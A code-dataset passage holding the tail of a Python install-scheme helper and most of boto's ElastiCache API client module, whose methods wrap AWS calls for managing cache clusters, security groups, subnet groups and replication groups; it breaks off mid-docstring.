# ideally, we'd prefer a scheme class that has no side-effects.
assert not (user and prefix), "user={} prefix={}".format(user, prefix)
i.user = user or i.user
if user:
i.prefix = ""
i.prefix = prefix or i.prefix
i.home = home or i.home
i.root = root or i.root
i.finalize_options()
for key in SCHEME_KEYS:
scheme[key] = getattr(i, 'install_' + key)
# install_lib specified in setup.cfg should install *everything*
# into there (i.e. it takes precedence over both purelib and
# platlib). Note, i.install_lib is *always* set after
# finalize_options(); we only want to override here if the user
# has explicitly requested it hence going back to the config
if 'install_lib' in d.get_option_dict('install'):
scheme.update(dict(purelib=i.install_lib, platlib=i.install_lib))
if running_under_virtualenv():
scheme['headers'] = os.path.join(
sys.prefix,
'include',
'site',
'python' + sys.version[:3],
dist_name,
)
if root is not None:
path_no_drive = os.path.splitdrive(
os.path.abspath(scheme["headers"]))[1]
scheme["headers"] = os.path.join(
root,
path_no_drive[1:],
)
return scheme
|
mit
|
Workday/OpenFrame
|
tools/telemetry/third_party/gsutilz/third_party/boto/boto/elasticache/layer1.py
|
150
|
73538
|
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
from boto.compat import json
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
class ElastiCacheConnection(AWSQueryConnection):
"""
Amazon ElastiCache
Amazon ElastiCache is a web service that makes it easier to set
up, operate, and scale a distributed cache in the cloud.
With ElastiCache, customers gain all of the benefits of a high-
performance, in-memory cache with far less of the administrative
burden of launching and managing a distributed cache. The service
makes set-up, scaling, and cluster failure handling much simpler
than in a self-managed cache deployment.
In addition, through integration with Amazon CloudWatch, customers
get enhanced visibility into the key performance statistics
associated with their cache and can receive alarms if a part of
their cache runs hot.
"""
APIVersion = "2013-06-15"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "elasticache.us-east-1.amazonaws.com"
def __init__(self, **kwargs):
region = kwargs.get('region')
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
else:
del kwargs['region']
kwargs['host'] = region.endpoint
super(ElastiCacheConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def authorize_cache_security_group_ingress(self,
cache_security_group_name,
ec2_security_group_name,
ec2_security_group_owner_id):
"""
The AuthorizeCacheSecurityGroupIngress operation allows
network ingress to a cache security group. Applications using
ElastiCache must be running on Amazon EC2, and Amazon EC2
security groups are used as the authorization mechanism.
You cannot authorize ingress from an Amazon EC2 security group
in one Region to an ElastiCache cluster in another Region.
:type cache_security_group_name: string
:param cache_security_group_name: The cache security group which will
allow network ingress.
:type ec2_security_group_name: string
:param ec2_security_group_name: The Amazon EC2 security group to be
authorized for ingress to the cache security group.
:type ec2_security_group_owner_id: string
:param ec2_security_group_owner_id: The AWS account number of the
Amazon EC2 security group owner. Note that this is not the same
thing as an AWS access key ID - you must provide a valid AWS
account number for this parameter.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
'EC2SecurityGroupName': ec2_security_group_name,
'EC2SecurityGroupOwnerId': ec2_security_group_owner_id,
}
return self._make_request(
action='AuthorizeCacheSecurityGroupIngress',
verb='POST',
path='/', params=params)
def create_cache_cluster(self, cache_cluster_id, num_cache_nodes=None,
cache_node_type=None, engine=None,
replication_group_id=None, engine_version=None,
cache_parameter_group_name=None,
cache_subnet_group_name=None,
cache_security_group_names=None,
security_group_ids=None, snapshot_arns=None,
preferred_availability_zone=None,
preferred_maintenance_window=None, port=None,
notification_topic_arn=None,
auto_minor_version_upgrade=None):
"""
The CreateCacheCluster operation creates a new cache cluster.
All nodes in the cache cluster run the same protocol-compliant
cache engine software - either Memcached or Redis.
:type cache_cluster_id: string
:param cache_cluster_id:
The cache cluster identifier. This parameter is stored as a lowercase
string.
Constraints:
+ Must contain from 1 to 20 alphanumeric characters or hyphens.
+ First character must be a letter.
+ Cannot end with a hyphen or contain two consecutive hyphens.
:type replication_group_id: string
:param replication_group_id: The replication group to which this cache
cluster should belong. If this parameter is specified, the cache
cluster will be added to the specified replication group as a read
replica; otherwise, the cache cluster will be a standalone primary
that is not part of any replication group.
:type num_cache_nodes: integer
:param num_cache_nodes: The initial number of cache nodes that the
cache cluster will have.
For a Memcached cluster, valid values are between 1 and 20. If you need
to exceed this limit, please fill out the ElastiCache Limit
Increase Request form at ``_ .
For Redis, only single-node cache clusters are supported at this time,
so the value for this parameter must be 1.
:type cache_node_type: string
:param cache_node_type: The compute and memory capacity of the nodes in
the cache cluster.
Valid values for Memcached:
`cache.t1.micro` | `cache.m1.small` | `cache.m1.medium` |
`cache.m1.large` | `cache.m1.xlarge` | `cache.m3.xlarge` |
`cache.m3.2xlarge` | `cache.m2.xlarge` | `cache.m2.2xlarge` |
`cache.m2.4xlarge` | `cache.c1.xlarge`
Valid values for Redis:
`cache.t1.micro` | `cache.m1.small` | `cache.m1.medium` |
`cache.m1.large` | `cache.m1.xlarge` | `cache.m2.xlarge` |
`cache.m2.2xlarge` | `cache.m2.4xlarge` | `cache.c1.xlarge`
For a complete listing of cache node types and specifications, see `.
:type engine: string
:param engine: The name of the cache engine to be used for this cache
cluster.
Valid values for this parameter are:
`memcached` | `redis`
:type engine_version: string
:param engine_version: The version number of the cache engine to be
used for this cluster. To view the supported cache engine versions,
use the DescribeCacheEngineVersions operation.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of the cache parameter
group to associate with this cache cluster. If this argument is
omitted, the default cache parameter group for the specified engine
will be used.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name of the cache subnet group to
be used for the cache cluster.
Use this parameter only when you are creating a cluster in an Amazon
Virtual Private Cloud (VPC).
:type cache_security_group_names: list
:param cache_security_group_names: A list of cache security group names
to associate with this cache cluster.
Use this parameter only when you are creating a cluster outside of an
Amazon Virtual Private Cloud (VPC).
:type security_group_ids: list
:param security_group_ids: One or more VPC security groups associated
with the cache cluster.
Use this parameter only when you are creating a cluster in an Amazon
Virtual Private Cloud (VPC).
:type snapshot_arns: list
:param snapshot_arns: A single-element string list containing an Amazon
Resource Name (ARN) that uniquely identifies a Redis RDB snapshot
file stored in Amazon S3. The snapshot file will be used to
populate the Redis cache in the new cache cluster. The Amazon S3
object name in the ARN cannot contain any commas.
Here is an example of an Amazon S3 ARN:
`arn:aws:s3:::my_bucket/snapshot1.rdb`
**Note:** This parameter is only valid if the `Engine` parameter is
`redis`.
:type preferred_availability_zone: string
:param preferred_availability_zone: The EC2 Availability Zone in which
the cache cluster will be created.
All cache nodes belonging to a cache cluster are placed in the
preferred availability zone.
Default: System chosen availability zone.
:type preferred_maintenance_window: string
:param preferred_maintenance_window: The weekly time range (in UTC)
during which system maintenance can occur.
Example: `sun:05:00-sun:09:00`
:type port: integer
:param port: The port number on which each of the cache nodes will
accept connections.
:type notification_topic_arn: string
:param notification_topic_arn:
The Amazon Resource Name (ARN) of the Amazon Simple Notification
Service (SNS) topic to which notifications will be sent.
The Amazon SNS topic owner must be the same as the cache cluster owner.
:type auto_minor_version_upgrade: boolean
:param auto_minor_version_upgrade: Determines whether minor engine
upgrades will be applied automatically to the cache cluster during
the maintenance window. A value of `True` allows these upgrades to
occur; `False` disables automatic upgrades.
Default: `True`
"""
params = {
'CacheClusterId': cache_cluster_id,
}
if num_cache_nodes is not None:
params['NumCacheNodes'] = num_cache_nodes
if cache_node_type is not None:
params['CacheNodeType'] = cache_node_type
if engine is not None:
params['Engine'] = engine
if replication_group_id is not None:
params['ReplicationGroupId'] = replication_group_id
if engine_version is not None:
params['EngineVersion'] = engine_version
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if cache_subnet_group_name is not None:
params['CacheSubnetGroupName'] = cache_subnet_group_name
if cache_security_group_names is not None:
self.build_list_params(params,
cache_security_group_names,
'CacheSecurityGroupNames.member')
if security_group_ids is not None:
self.build_list_params(params,
security_group_ids,
'SecurityGroupIds.member')
if snapshot_arns is not None:
self.build_list_params(params,
snapshot_arns,
'SnapshotArns.member')
if preferred_availability_zone is not None:
params['PreferredAvailabilityZone'] = preferred_availability_zone
if preferred_maintenance_window is not None:
params['PreferredMaintenanceWindow'] = preferred_maintenance_window
if port is not None:
params['Port'] = port
if notification_topic_arn is not None:
params['NotificationTopicArn'] = notification_topic_arn
if auto_minor_version_upgrade is not None:
params['AutoMinorVersionUpgrade'] = str(
auto_minor_version_upgrade).lower()
return self._make_request(
action='CreateCacheCluster',
verb='POST',
path='/', params=params)
def create_cache_parameter_group(self, cache_parameter_group_name,
cache_parameter_group_family,
description):
"""
The CreateCacheParameterGroup operation creates a new cache
parameter group. A cache parameter group is a collection of
parameters that you apply to all of the nodes in a cache
cluster.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: A user-specified name for the cache
parameter group.
:type cache_parameter_group_family: string
:param cache_parameter_group_family: The name of the cache parameter
group family the cache parameter group can be used with.
Valid values are: `memcached1.4` | `redis2.6`
:type description: string
:param description: A user-specified description for the cache
parameter group.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
'CacheParameterGroupFamily': cache_parameter_group_family,
'Description': description,
}
return self._make_request(
action='CreateCacheParameterGroup',
verb='POST',
path='/', params=params)
def create_cache_security_group(self, cache_security_group_name,
description):
"""
The CreateCacheSecurityGroup operation creates a new cache
security group. Use a cache security group to control access
to one or more cache clusters.
Cache security groups are only used when you are creating a
cluster outside of an Amazon Virtual Private Cloud (VPC). If
you are creating a cluster inside of a VPC, use a cache subnet
group instead. For more information, see
CreateCacheSubnetGroup .
:type cache_security_group_name: string
:param cache_security_group_name: A name for the cache security group.
This value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters.
Must not be the word "Default".
Example: `mysecuritygroup`
:type description: string
:param description: A description for the cache security group.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
'Description': description,
}
return self._make_request(
action='CreateCacheSecurityGroup',
verb='POST',
path='/', params=params)
def create_cache_subnet_group(self, cache_subnet_group_name,
cache_subnet_group_description, subnet_ids):
"""
The CreateCacheSubnetGroup operation creates a new cache
subnet group.
Use this parameter only when you are creating a cluster in an
Amazon Virtual Private Cloud (VPC).
:type cache_subnet_group_name: string
:param cache_subnet_group_name: A name for the cache subnet group. This
value is stored as a lowercase string.
Constraints: Must contain no more than 255 alphanumeric characters or
hyphens.
Example: `mysubnetgroup`
:type cache_subnet_group_description: string
:param cache_subnet_group_description: A description for the cache
subnet group.
:type subnet_ids: list
:param subnet_ids: A list of VPC subnet IDs for the cache subnet group.
"""
params = {
'CacheSubnetGroupName': cache_subnet_group_name,
'CacheSubnetGroupDescription': cache_subnet_group_description,
}
self.build_list_params(params,
subnet_ids,
'SubnetIds.member')
return self._make_request(
action='CreateCacheSubnetGroup',
verb='POST',
path='/', params=params)
def create_replication_group(self, replication_group_id,
primary_cluster_id,
replication_group_description):
"""
The CreateReplicationGroup operation creates a replication
group. A replication group is a collection of cache clusters,
where one of the clusters is a read/write primary and the
other clusters are read-only replicas. Writes to the primary
are automatically propagated to the replicas.
When you create a replication group, you must specify an
existing cache cluster that is in the primary role. When the
replication group has been successfully created, you can add
one or more read replica replicas to it, up to a total of five
read replicas.
:type replication_group_id: string
:param replication_group_id:
The replication group identifier. This parameter is stored as a
lowercase string.
Constraints:
+ Must contain from 1 to 20 alphanumeric characters or hyphens.
+ First character must be a letter.
+ Cannot end with a hyphen or contain two consecutive hyphens.
:type primary_cluster_id: string
:param primary_cluster_id: The identifier of the cache cluster that
will serve as the primary for this replication group. This cache
cluster must already exist and have a status of available .
:type replication_group_description: string
:param replication_group_description: A user-specified description for
the replication group.
"""
params = {
'ReplicationGroupId': replication_group_id,
'PrimaryClusterId': primary_cluster_id,
'ReplicationGroupDescription': replication_group_description,
}
return self._make_request(
action='CreateReplicationGroup',
verb='POST',
path='/', params=params)
def delete_cache_cluster(self, cache_cluster_id):
"""
The DeleteCacheCluster operation deletes a previously
provisioned cache cluster. DeleteCacheCluster deletes all
associated cache nodes, node endpoints and the cache cluster
itself. When you receive a successful response from this
operation, Amazon ElastiCache immediately begins deleting the
cache cluster; you cannot cancel or revert this operation.
:type cache_cluster_id: string
:param cache_cluster_id: The cache cluster identifier for the cluster
to be deleted. This parameter is not case sensitive.
"""
params = {'CacheClusterId': cache_cluster_id, }
return self._make_request(
action='DeleteCacheCluster',
verb='POST',
path='/', params=params)
def delete_cache_parameter_group(self, cache_parameter_group_name):
"""
The DeleteCacheParameterGroup operation deletes the specified
cache parameter group. You cannot delete a cache parameter
group if it is associated with any cache clusters.
:type cache_parameter_group_name: string
:param cache_parameter_group_name:
The name of the cache parameter group to delete.
The specified cache security group must not be associated with any
cache clusters.
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
return self._make_request(
action='DeleteCacheParameterGroup',
verb='POST',
path='/', params=params)
def delete_cache_security_group(self, cache_security_group_name):
"""
The DeleteCacheSecurityGroup operation deletes a cache
security group.
You cannot delete a cache security group if it is associated
with any cache clusters.
:type cache_security_group_name: string
:param cache_security_group_name:
The name of the cache security group to delete.
You cannot delete the default security group.
"""
params = {
'CacheSecurityGroupName': cache_security_group_name,
}
return self._make_request(
action='DeleteCacheSecurityGroup',
verb='POST',
path='/', params=params)
def delete_cache_subnet_group(self, cache_subnet_group_name):
"""
The DeleteCacheSubnetGroup operation deletes a cache subnet
group.
You cannot delete a cache subnet group if it is associated
with any cache clusters.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name of the cache subnet group to
delete.
Constraints: Must contain no more than 255 alphanumeric characters or
hyphens.
"""
params = {'CacheSubnetGroupName': cache_subnet_group_name, }
return self._make_request(
action='DeleteCacheSubnetGroup',
verb='POST',
path='/', params=params)
def delete_replication_group(self, replication_group_id):
"""
The DeleteReplicationGroup operation deletes an existing
replication group. DeleteReplicationGroup deletes the primary
cache cluster and all of the read replicas in the replication
group. When you receive a successful response from this
operation, Amazon ElastiCache immediately begins deleting the
entire replication group; you cannot cancel or revert this
operation.
:type replication_group_id: string
:param replication_group_id: The identifier for the replication group
to be deleted. This parameter is not case sensitive.
"""
params = {'ReplicationGroupId': replication_group_id, }
return self._make_request(
action='DeleteReplicationGroup',
verb='POST',
path='/', params=params)
def describe_cache_clusters(self, cache_cluster_id=None,
max_records=None, marker=None,
show_cache_node_info=None):
"""
The DescribeCacheClusters operation returns information about
all provisioned cache clusters if no cache cluster identifier
is specified, or about a specific cache cluster if a cache
cluster identifier is supplied.
By default, abbreviated information about the cache
clusters(s) will be returned. You can use the optional
ShowDetails flag to retrieve detailed information about the
cache nodes associated with the cache clusters. These details
include the DNS address and port for the cache node endpoint.
If the cluster is in the CREATING state, only cluster level
information will be displayed until all of the nodes are
successfully provisioned.
If the cluster is in the DELETING state, only cluster level
information will be displayed.
If cache nodes are currently being added to the cache cluster,
node endpoint information and creation time for the additional
nodes will not be displayed until they are completely
provisioned. When the cache cluster state is available , the
cluster is ready for use.
If cache nodes are currently being removed from the cache
cluster, no endpoint information for the removed nodes is
displayed.
:type cache_cluster_id: string
:param cache_cluster_id: The user-supplied cluster identifier. If this
parameter is specified, only information about that specific cache
cluster is returned. This parameter isn't case sensitive.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
:type show_cache_node_info: boolean
:param show_cache_node_info: An optional flag that can be included in
the DescribeCacheCluster request to retrieve information about the
individual cache nodes.
"""
params = {}
if cache_cluster_id is not None:
params['CacheClusterId'] = cache_cluster_id
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
if show_cache_node_info is not None:
params['ShowCacheNodeInfo'] = str(
show_cache_node_info).lower()
return self._make_request(
action='DescribeCacheClusters',
verb='POST',
path='/', params=params)
def describe_cache_engine_versions(self, engine=None,
engine_version=None,
cache_parameter_group_family=None,
max_records=None, marker=None,
default_only=None):
"""
The DescribeCacheEngineVersions operation returns a list of
the available cache engines and their versions.
:type engine: string
:param engine: The cache engine to return. Valid values: `memcached` |
`redis`
:type engine_version: string
:param engine_version: The cache engine version to return.
Example: `1.4.14`
:type cache_parameter_group_family: string
:param cache_parameter_group_family:
The name of a specific cache parameter group family to return details
for.
Constraints:
+ Must be 1 to 255 alphanumeric characters
+ First character must be a letter
+ Cannot end with a hyphen or contain two consecutive hyphens
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
:type default_only: boolean
:param default_only: If true , specifies that only the default version
of the specified engine or engine and major version combination is
to be returned.
"""
params = {}
if engine is not None:
params['Engine'] = engine
if engine_version is not None:
params['EngineVersion'] = engine_version
if cache_parameter_group_family is not None:
params['CacheParameterGroupFamily'] = cache_parameter_group_family
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
if default_only is not None:
params['DefaultOnly'] = str(
default_only).lower()
return self._make_request(
action='DescribeCacheEngineVersions',
verb='POST',
path='/', params=params)
def describe_cache_parameter_groups(self,
cache_parameter_group_name=None,
max_records=None, marker=None):
"""
The DescribeCacheParameterGroups operation returns a list of
cache parameter group descriptions. If a cache parameter group
name is specified, the list will contain only the descriptions
for that group.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of a specific cache
parameter group to return details for.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if cache_parameter_group_name is not None:
params['CacheParameterGroupName'] = cache_parameter_group_name
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheParameterGroups',
verb='POST',
path='/', params=params)
def describe_cache_parameters(self, cache_parameter_group_name,
source=None, max_records=None, marker=None):
"""
The DescribeCacheParameters operation returns the detailed
parameter list for a particular cache parameter group.
:type cache_parameter_group_name: string
:param cache_parameter_group_name: The name of a specific cache
parameter group to return details for.
:type source: string
:param source: The parameter types to return.
Valid values: `user` | `system` | `engine-default`
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {
'CacheParameterGroupName': cache_parameter_group_name,
}
if source is not None:
params['Source'] = source
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheParameters',
verb='POST',
path='/', params=params)
def describe_cache_security_groups(self, cache_security_group_name=None,
max_records=None, marker=None):
"""
The DescribeCacheSecurityGroups operation returns a list of
cache security group descriptions. If a cache security group
name is specified, the list will contain only the description
of that group.
:type cache_security_group_name: string
:param cache_security_group_name: The name of the cache security group
to return details for.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if cache_security_group_name is not None:
params['CacheSecurityGroupName'] = cache_security_group_name
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheSecurityGroups',
verb='POST',
path='/', params=params)
def describe_cache_subnet_groups(self, cache_subnet_group_name=None,
max_records=None, marker=None):
"""
The DescribeCacheSubnetGroups operation returns a list of
cache subnet group descriptions. If a subnet group name is
specified, the list will contain only the description of that
group.
:type cache_subnet_group_name: string
:param cache_subnet_group_name: The name of the cache subnet group to
return details for.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if cache_subnet_group_name is not None:
params['CacheSubnetGroupName'] = cache_subnet_group_name
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeCacheSubnetGroups',
verb='POST',
path='/', params=params)
def describe_engine_default_parameters(self,
cache_parameter_group_family,
max_records=None, marker=None):
"""
The DescribeEngineDefaultParameters operation returns the
default engine and system parameter information for the
specified cache engine.
:type cache_parameter_group_family: string
:param cache_parameter_group_family: The name of the cache parameter
group family. Valid values are: `memcached1.4` | `redis2.6`
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {
'CacheParameterGroupFamily': cache_parameter_group_family,
}
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeEngineDefaultParameters',
verb='POST',
path='/', params=params)
def describe_events(self, source_identifier=None, source_type=None,
start_time=None, end_time=None, duration=None,
max_records=None, marker=None):
"""
The DescribeEvents operation returns events related to cache
clusters, cache security groups, and cache parameter groups.
You can obtain events specific to a particular cache cluster,
cache security group, or cache parameter group by providing
the name as a parameter.
By default, only the events occurring within the last hour are
returned; however, you can retrieve up to 14 days' worth of
events if necessary.
:type source_identifier: string
:param source_identifier: The identifier of the event source for which
events will be returned. If not specified, then all sources are
included in the response.
:type source_type: string
:param source_type: The event source to retrieve events for. If no
value is specified, all events are returned.
Valid values are: `cache-cluster` | `cache-parameter-group` | `cache-
security-group` | `cache-subnet-group`
:type start_time: timestamp
:param start_time: The beginning of the time interval to retrieve
events for, specified in ISO 8601 format.
:type end_time: timestamp
:param end_time: The end of the time interval for which to retrieve
events, specified in ISO 8601 format.
:type duration: integer
:param duration: The number of minutes' worth of events to retrieve.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if source_identifier is not None:
params['SourceIdentifier'] = source_identifier
if source_type is not None:
params['SourceType'] = source_type
if start_time is not None:
params['StartTime'] = start_time
if end_time is not None:
params['EndTime'] = end_time
if duration is not None:
params['Duration'] = duration
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeEvents',
verb='POST',
path='/', params=params)
def describe_replication_groups(self, replication_group_id=None,
max_records=None, marker=None):
"""
The DescribeReplicationGroups operation returns information
about a particular replication group. If no identifier is
specified, DescribeReplicationGroups returns information about
all replication groups.
:type replication_group_id: string
:param replication_group_id: The identifier for the replication group
to be described. This parameter is not case sensitive.
If you do not specify this parameter, information about all replication
groups is returned.
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if replication_group_id is not None:
params['ReplicationGroupId'] = replication_group_id
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeReplicationGroups',
verb='POST',
path='/', params=params)
def describe_reserved_cache_nodes(self, reserved_cache_node_id=None,
reserved_cache_nodes_offering_id=None,
cache_node_type=None, duration=None,
product_description=None,
offering_type=None, max_records=None,
marker=None):
"""
The DescribeReservedCacheNodes operation returns information
about reserved cache nodes for this account, or about a
specified reserved cache node.
:type reserved_cache_node_id: string
:param reserved_cache_node_id: The reserved cache node identifier
filter value. Use this parameter to show only the reservation that
matches the specified reservation ID.
:type reserved_cache_nodes_offering_id: string
:param reserved_cache_nodes_offering_id: The offering identifier filter
value. Use this parameter to show only purchased reservations
matching the specified offering identifier.
:type cache_node_type: string
:param cache_node_type: The cache node type filter value. Use this
parameter to show only those reservations matching the specified
cache node type.
:type duration: string
:param duration: The duration filter value, specified in years or
seconds. Use this parameter to show only reservations for this
duration.
Valid Values: `1 | 3 | 31536000 | 94608000`
:type product_description: string
:param product_description: The product description filter value. Use
this parameter to show only those reservations matching the
specified product description.
:type offering_type: string
:param offering_type: The offering type filter value. Use this
parameter to show only the available offerings matching the
specified offering type.
Valid values: `"Light Utilization" | "Medium Utilization" | "Heavy
Utilization" `
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if reserved_cache_node_id is not None:
params['ReservedCacheNodeId'] = reserved_cache_node_id
if reserved_cache_nodes_offering_id is not None:
params['ReservedCacheNodesOfferingId'] = reserved_cache_nodes_offering_id
if cache_node_type is not None:
params['CacheNodeType'] = cache_node_type
if duration is not None:
params['Duration'] = duration
if product_description is not None:
params['ProductDescription'] = product_description
if offering_type is not None:
params['OfferingType'] = offering_type
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeReservedCacheNodes',
verb='POST',
path='/', params=params)
def describe_reserved_cache_nodes_offerings(self,
reserved_cache_nodes_offering_id=None,
cache_node_type=None,
duration=None,
product_description=None,
offering_type=None,
max_records=None,
marker=None):
"""
The DescribeReservedCacheNodesOfferings operation lists
available reserved cache node offerings.
:type reserved_cache_nodes_offering_id: string
:param reserved_cache_nodes_offering_id: The offering identifier filter
value. Use this parameter to show only the available offering that
matches the specified reservation identifier.
Example: `438012d3-4052-4cc7-b2e3-8d3372e0e706`
:type cache_node_type: string
:param cache_node_type: The cache node type filter value. Use this
parameter to show only the available offerings matching the
specified cache node type.
:type duration: string
:param duration: Duration filter value, specified in years or seconds.
Use this parameter to show only reservations for a given duration.
Valid Values: `1 | 3 | 31536000 | 94608000`
:type product_description: string
:param product_description: The product description filter value. Use
this parameter to show only the available offerings matching the
specified product description.
:type offering_type: string
:param offering_type: The offering type filter value. Use this
parameter to show only the available offerings matching the
specified offering type.
Valid Values: `"Light Utilization" | "Medium Utilization" | "Heavy
Utilization" `
:type max_records: integer
:param max_records: The maximum number of records to include in the
response. If more records exist than the specified `MaxRecords`
value, a marker is included in the response so that the remaining
results can be retrieved.
Default: 100
Constraints: minimum 20; maximum 100.
:type marker: string
:param marker: An optional marker returned from a prior request. Use
this marker for pagination of results from this operation. If this
parameter is specified, the response includes only records beyond
the marker, up to the value specified by MaxRecords .
"""
params = {}
if reserved_cache_nodes_offering_id is not None:
params['ReservedCacheNodesOfferingId'] = reserved_cache_nodes_offering_id
if cache_node_type is not None:
params['CacheNodeType'] = cache_node_type
if duration is not None:
params['Duration'] = duration
if product_description is not None:
params['ProductDescription'] = product_description
if offering_type is not None:
params['OfferingType'] = offering_type
if max_records is not None:
params['MaxRecords'] = max_records
if marker is not None:
params['Marker'] = marker
return self._make_request(
action='DescribeReservedCacheNodesOfferings',
verb='POST',
path='/', params=params)
def modify_cache_cluster(self, cache_cluster_id, num_cache_nodes=None,
cache_node_ids_to_remove=None,
cache_security_group_names=None,
security_group_ids=None,
preferred_maintenance_window=None,
notification_topic_arn=None,
cache_parameter_group_name=None,
notification_topic_status=None,
apply_immediately=None, engine_version=None,
auto_minor_version_upgrade=None):
"""
The ModifyCacheCluster operation modifies the settings for a
